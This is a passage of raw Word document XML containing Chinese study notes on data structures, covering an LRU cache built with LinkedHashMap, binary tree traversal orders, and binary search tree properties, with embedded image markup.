                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4720934"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214EB8" w:rsidRDefault="00214EB8" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="5274310"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="259"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10" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="5274310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C58EB" w:rsidRDefault="006C58EB" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4984349"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="260"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11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4984349"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB7D1F" w:rsidRDefault="00DB7D1F" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB7D1F" w:rsidRPr="00AA21D0" w:rsidRDefault="00DB7D1F" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7D1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.tuicool.com/articles/nYjmay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2372A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D2372A" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>2.2  LRU Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC779D" w:rsidRDefault="003D3CB7" w:rsidP="00CC779D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="107" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="323" w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全称是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Least</w:t>
      </w:r>
      <w:r w:rsidR="00364C45" w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Recently Used</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，即最近最久未使用的意思。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E60CAA" w:rsidRPr="00CC779D" w:rsidRDefault="00F93F5F" w:rsidP="00CC779D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="107" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="323" w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>那就是利用链表和</w:t>
      </w:r>
      <w:r w:rsidR="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ash</w:t>
      </w:r>
      <w:r w:rsidR="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ap</w:t>
      </w:r>
      <w:r w:rsidR="001C3627">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(LinkedHashMap)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。当需要插入新的数据项的时候，如果新数据项在链表中存在（一般称为命中），则把该节点移到链表头部，如果不存在，则新建一个节点，放到链表头部，若缓存满了，则把链表最后一个节点删除即可。在访问数据的时候，如果数据项在链表中存在，则把该节点移到链表头部，否则返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC779D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。这样一来在链表尾部的节点就是最近最久未访问的数据项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00784E79" w:rsidRPr="00F41A4C" w:rsidRDefault="00784E79" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00784E79" w:rsidRPr="00F41A4C" w:rsidRDefault="00E205C8" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00784E79" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00784E79" w:rsidRPr="00F41A4C">
        <w:t>二叉树遍历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00784E79" w:rsidRPr="00C040F1" w:rsidRDefault="00784E79" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先序</w:t>
      </w:r>
      <w:r w:rsidR="001342B6" w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>左</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>右</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00784E79" w:rsidRPr="00C040F1" w:rsidRDefault="00784E79" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>中序：</w:t>
      </w:r>
      <w:r w:rsidR="005140D6" w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>左</w:t>
      </w:r>
      <w:r w:rsidR="005140D6" w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
      <w:r w:rsidR="005140D6" w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根</w:t>
      </w:r>
      <w:r w:rsidR="005140D6" w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-------</w:t>
      </w:r>
      <w:r w:rsidR="005140D6" w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>右</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005140D6" w:rsidRPr="00C040F1" w:rsidRDefault="005140D6" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后续：左</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>右</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C040F1" w:rsidRPr="00C040F1" w:rsidRDefault="00C040F1" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C040F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://segmentfault.com/a/1190000003532763</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C21F0" w:rsidRPr="00F41A4C" w:rsidRDefault="00E205C8" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004C21F0" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004C21F0" w:rsidRPr="00F41A4C">
        <w:t>二叉</w:t>
      </w:r>
      <w:r w:rsidR="006E6B3F">
        <w:t>搜索</w:t>
      </w:r>
      <w:r w:rsidR="004C21F0" w:rsidRPr="00F41A4C">
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1500" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1500" w:rsidP="009B1500">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258"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二叉排序树或者是一棵空树，或者是具有下列性质的</w:t>
      </w:r>
      <w:hyperlink r:id="rId212" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="136EC2"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>二叉树</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1500" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1500" w:rsidP="009B1500">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258"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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）若左子树不空，则左子树上所有结点的值均小于它的</w:t>
      </w:r>
      <w:hyperlink r:id="rId213" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="136EC2"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>根结</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>点的值；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1500" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1500" w:rsidP="009B1500">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258"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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）若右子树不空，则右子树上所有结点的值均大于它的根结点的值；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1500" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1500" w:rsidP="009B1500">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258"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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）左、右子树也分别为二叉排序树；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1500" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1500" w:rsidP="009B1500">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258"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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）没有键值相等的节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C21F0" w:rsidRPr="00F41A4C" w:rsidRDefault="004C21F0" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F014D" w:rsidRDefault="003D3309" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平衡</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>二叉</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C21F0" w:rsidRPr="009F07BE" w:rsidRDefault="009F07BE" w:rsidP="009F07BE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="107" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="323" w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
